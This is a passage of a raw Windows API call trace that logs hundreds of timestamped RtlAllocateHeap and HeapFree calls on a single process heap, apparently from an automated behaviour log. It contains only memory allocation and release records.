RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2476ee0 [0156.043] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x248a0f0 [0156.043] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x249d300 [0156.043] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x24b0510 [0156.044] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x24c3720 [0156.044] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x24d6930 [0156.045] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x24e9b40 [0156.045] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x24fcd50 [0156.045] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x250ff60 [0156.046] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2523170 [0156.046] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x468) returned 0x5ac5f0 [0156.046] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598b10 | out: hHeap=0x580000) returned 1 [0156.046] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2536380 [0156.047] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2549590 [0156.047] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x255c7a0 [0156.048] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x256f9b0 [0156.048] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2582bc0 [0156.049] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x25a0080 [0156.050] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x25b3290 [0156.050] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x25c64a0 [0156.051] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x25d96b0 [0156.051] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x25ec8c0 [0156.052] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x25ffad0 [0156.052] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2612ce0 [0156.052] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2625ef0 [0156.053] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2639100 [0156.053] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x264c310 [0156.054] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x265f520 [0156.054] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2672730 [0156.054] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2685940 [0156.055] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2698b50 [0156.055] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x26abd60 [0156.056] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x26bef70 [0156.056] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x26d2180 [0156.057] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x26e5390 [0156.057] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x26f85a0 [0156.057] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x270b7b0 [0156.058] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x271e9c0 [0156.058] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2731bd0 [0156.059] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2744de0 [0156.059] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2757ff0 [0156.059] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x276b200 [0156.060] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x277e410 [0156.061] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2791620 [0156.061] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x27a4830 [0156.061] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x27b7a40 [0156.062] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x27cac50 [0156.062] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x27dde60 [0156.063] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x27f1070 [0156.063] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2804280 [0156.064] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2817490 [0156.064] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x282a6a0 [0156.138] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x283d8b0 [0156.139] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2850ac0 [0156.139] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2863cd0 [0156.140] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2876ee0 [0156.140] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x288a0f0 [0156.141] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x289d300 [0156.141] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x28b0510 [0156.141] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x698) returned 0x598910 [0156.141] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac5f0 | out: hHeap=0x580000) returned 1 [0156.142] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x28c3720 [0156.142] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x28d6930 [0156.142] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x28e9b40 [0156.142] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x28fcd50 [0156.143] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x290ff60 [0156.143] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2923170 [0156.143] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2936380 [0156.144] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2949590 [0156.144] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x295c7a0 [0156.145] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x296f9b0 [0156.145] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2982bc0 [0156.145] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2995dd0 [0156.146] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x29a8fe0 [0156.146] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x29bc1f0 [0156.147] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x29cf400 [0156.147] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x29e2610 [0156.148] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x29f5820 [0156.148] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a08a30 [0156.148] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a1bc40 [0156.149] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a2ee50 [0156.149] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a42060 [0156.149] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a55270 [0156.150] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a68480 [0156.150] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a7b690 [0156.151] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2a8e8a0 [0156.151] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2aa1ab0 [0156.151] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ab4cc0 [0156.151] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ac7ed0 [0156.152] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2adb0e0 [0156.152] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2aee2f0 [0156.152] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b01500 [0156.153] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b14710 [0156.153] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b27920 [0156.153] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b3ab30 [0156.154] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b4dd40 [0156.154] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b60f50 [0156.155] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b74160 [0156.155] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b87370 [0156.155] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2b9a580 [0156.156] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2bad790 [0156.156] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2bc09a0 [0156.156] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2bd3bb0 [0156.157] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2be6dc0 [0156.157] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2bf9fd0 [0156.158] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c0d1e0 [0156.158] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c203f0 [0156.158] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c33600 [0156.159] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c46810 [0156.159] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c59a20 [0156.159] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c6cc30 [0156.160] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c7fe40 [0156.160] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2c93050 [0156.160] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ca6260 [0156.161] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2cb9470 [0156.161] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ccc680 [0156.161] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2cdf890 [0156.162] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2cf2aa0 [0156.162] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d05cb0 [0156.163] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d18ec0 [0156.163] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d2c0d0 [0156.163] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d3f2e0 [0156.164] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d524f0 [0156.164] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d65700 [0156.164] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2d78910 [0156.164] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2da0080 [0156.165] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2db3290 [0156.166] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2dc64a0 [0156.166] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2dd96b0 [0156.166] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2dec8c0 [0156.167] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2dffad0 [0156.167] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9e0) returned 0x5ac5f0 [0156.167] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598910 | out: hHeap=0x580000) returned 1 [0156.167] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e12ce0 [0156.168] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e25ef0 [0156.168] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e39100 [0156.168] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e4c310 [0156.169] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e5f520 [0156.169] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e72730 [0156.169] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e85940 [0156.170] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2e98b50 [0156.170] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2eabd60 [0156.170] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ebef70 [0156.171] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ed2180 [0156.171] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ee5390 [0156.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2ef85a0 [0156.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2f0b7b0 [0156.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13200) returned 0x2f1e9c0 [0156.276] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac5f0 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b7480 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d7280 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ea490 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5fd6a0 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x6108b0 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x623ac0 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x636cd0 | out: hHeap=0x580000) returned 1 [0163.257] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x649ee0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x65d0f0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1ea0080 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1eb3290 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1ec64a0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1ed96b0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1eec8c0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1effad0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1f12ce0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1f25ef0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1f39100 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1f4c310 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1f5f520 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1f72730 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1fa0080 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1fb3290 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1fc64a0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1fd96b0 | out: hHeap=0x580000) returned 1 [0163.258] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1fec8c0 | out: hHeap=0x580000) returned 1 [0163.270] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x1fffad0 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2012ce0 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2025ef0 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2039100 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x204c310 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x205f520 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2072730 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2085940 | out: hHeap=0x580000) returned 1 [0163.271] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2098b50 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x20abd60 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x20bef70 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x20d2180 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x20e5390 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x20f85a0 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x210b7b0 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x211e9c0 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2131bd0 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2144de0 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2157ff0 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x216b200 | out: hHeap=0x580000) returned 1 [0163.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x217e410 | out: hHeap=0x580000) returned 1 [0163.278] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x21a0080 | out: hHeap=0x580000) returned 1 [0163.278] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x21b3290 | out: hHeap=0x580000) returned 1 [0163.361] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x21c64a0 | out: hHeap=0x580000) returned 1 [0163.361] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x21d96b0 | out: hHeap=0x580000) returned 1 [0163.361] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x21ec8c0 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x21ffad0 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2212ce0 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2225ef0 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2239100 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x224c310 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x225f520 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2272730 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2285940 | out: hHeap=0x580000) returned 1 [0163.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2298b50 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x22abd60 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x22bef70 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x22d2180 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x22e5390 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x22f85a0 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x230b7b0 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x231e9c0 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2331bd0 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2344de0 | out: hHeap=0x580000) returned 1 [0163.368] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2357ff0 | out: hHeap=0x580000) returned 1 [0163.373] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x236b200 | out: hHeap=0x580000) returned 1 [0163.375] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x237e410 | out: hHeap=0x580000) returned 1 [0163.375] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2391620 | out: hHeap=0x580000) returned 1 [0163.376] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x23a4830 | out: hHeap=0x580000) returned 1 [0163.380] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x23b7a40 | out: hHeap=0x580000) returned 1 [0163.380] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x23cac50 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x23dde60 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x23f1070 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2404280 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2417490 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x242a6a0 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x243d8b0 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2450ac0 | out: hHeap=0x580000) returned 1 [0163.381] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2463cd0 | out: hHeap=0x580000) returned 1 [0163.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2476ee0 | out: hHeap=0x580000) returned 1 [0163.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x248a0f0 | out: hHeap=0x580000) returned 1 [0163.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x249d300 | out: hHeap=0x580000) returned 1 [0163.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x24b0510 | out: hHeap=0x580000) returned 1 [0163.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x24c3720 | out: hHeap=0x580000) returned 1 [0163.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x24d6930 | out: hHeap=0x580000) returned 1 [0163.391] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x24e9b40 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x24fcd50 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x250ff60 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2523170 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2536380 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2549590 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x255c7a0 | out: hHeap=0x580000) returned 1 [0163.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x256f9b0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2582bc0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x25a0080 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x25b3290 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x25c64a0 | out: hHeap=0x580000) returned 1 [0163.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, 